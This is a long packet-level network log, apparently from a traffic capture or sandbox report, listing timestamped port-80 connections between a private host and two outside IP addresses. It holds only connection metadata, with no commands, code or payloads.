                                                                              Oct 26, 2023 09:45:56.112708092 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.112728119 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.112746000 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.112749100 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.112765074 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.112771034 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.112823963 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.112833977 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.112942934 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.112986088 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.113001108 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.113043070 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.113107920 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.113137007 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.113172054 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.113215923 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.113240004 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.113276005 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.113317013 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.113753080 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.113791943 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.113832951 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.113857985 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.113878012 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.113920927 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.113967896 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.114049911 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.114089966 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.114120007 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.114649057 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.114692926 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.114716053 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.114770889 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.114809990 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.114840031 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.115020990 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.115060091 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.288892984 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.288918972 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.288935900 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.288957119 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.288986921 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.289032936 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.289064884 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.289103985 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.289103985 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.289161921 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.289199114 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.289248943 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.289283991 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.289303064 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.289374113 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.289402962 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.289424896 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.289465904 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.289478064 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.289531946 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.289573908 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.290186882 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.290252924 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.290307999 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.290321112 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.290355921 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.290426016 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.290456057 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.290488958 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.290554047 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.290575027 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.291162014 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.291234970 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.291389942 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.291496992 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.291547060 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.291558027 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.291740894 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.291800022 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.466145039 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466284990 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466304064 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466324091 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466344118 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466346025 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.466362000 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466376066 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.466381073 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466449976 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.466505051 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466548920 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466553926 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.466633081 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466646910 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466675043 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.466692924 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466736078 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.466738939 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466782093 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.466829062 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.467500925 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.467549086 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.467590094 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.467650890 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.467664003 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.467700958 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.467703104 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.467735052 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.467773914 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.467776060 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.468704939 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.468748093 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.468750954 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.468813896 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.468852997 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.468861103 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.468875885 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.468921900 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.560750961 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.560765982 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.560831070 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.560890913 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.560928106 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.560959101 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.560980082 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.561008930 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.561055899 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.561131954 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.561189890 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.561233997 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.561235905 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.561261892 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.561302900 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.561316967 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.561373949 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.561414957 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.561429024 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.561472893 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.561518908 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.562032938 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.562093019 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.562134027 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.562155008 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.562201977 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.562238932 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.562261105 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.562305927 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.562345028 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.562421083 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.562928915 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.562973022 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.562983036 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.563025951 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.563062906 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.563100100 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.563214064 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.563251019 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.563457966 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.563646078 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.563693047 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.564028025 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.564080000 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.564119101 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.564197063 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.564244032 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.564256907 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.564280987 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.564342022 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.564378023 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.564414978 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.564845085 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.564886093 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.564909935 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.564973116 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.564997911 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.565011024 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.565149069 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.565196991 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.565208912 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.565260887 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.565305948 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.565860987 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.565984011 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.566021919 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.566044092 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.566097021 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.566129923 CEST8049704172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:45:56.566193104 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.612158060 CEST4970480192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:45:56.642620087 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:56.844894886 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:56.845148087 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:56.845295906 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.048443079 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.048468113 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.048481941 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.048531055 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.048825979 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.048870087 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.048890114 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.048907995 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.048949957 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.048975945 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.049052954 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.049093962 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.049118042 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.049204111 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.049258947 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.250775099 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.250848055 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.250897884 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.250916004 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.250943899 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.250991106 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.251000881 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.251055002 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.251091957 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.251107931 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.251163006 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.251204967 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.251240969 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.251241922 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.251290083 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.251768112 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.251853943 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.251900911 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.251909971 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.251986027 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.252031088 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.252034903 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.252098083 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.252136946 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.252136946 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.252191067 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.252229929 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.252238035 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.252315998 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.252353907 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.454190969 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454210043 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454226017 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454276085 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.454277039 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454304934 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454329967 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.454372883 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454428911 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454472065 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454479933 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.454515934 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454559088 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.454572916 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454605103 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454611063 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.454663038 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454709053 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.454729080 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454771042 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454802036 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454854012 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454855919 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.454900980 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.454909086 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454943895 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.454988003 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.455123901 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455192089 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455239058 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455254078 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.455281973 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455323935 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.455363035 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455440044 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455483913 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.455486059 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455524921 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455585957 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.455590010 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455686092 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455733061 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.455744982 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455790043 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455828905 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.455837011 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455957890 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.455977917 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.456000090 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.456006050 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.456059933 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.456110001 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.456172943 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.456221104 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.456260920 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.456307888 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.456352949 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.456413984 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.456484079 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.456528902 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.656466007 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656491995 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656507969 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656522036 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656532049 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.656536102 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656550884 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656562090 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.656564951 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656611919 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.656615019 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656653881 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.656661987 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656697035 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656737089 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.656763077 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656824112 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656862974 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656866074 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.656897068 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.656940937 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.656950951 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.657030106 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.657068968 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.657073975 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.657109976 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.657126904 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.657150030 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.657218933 CEST8049707141.98.10.13192.168.2.7
                                                                              Oct 26, 2023 09:45:57.657255888 CEST4970780192.168.2.7141.98.10.13
                                                                              Oct 26, 2023 09:45:57.657274008 CEST8049707141.98.10.13192.168.2.7
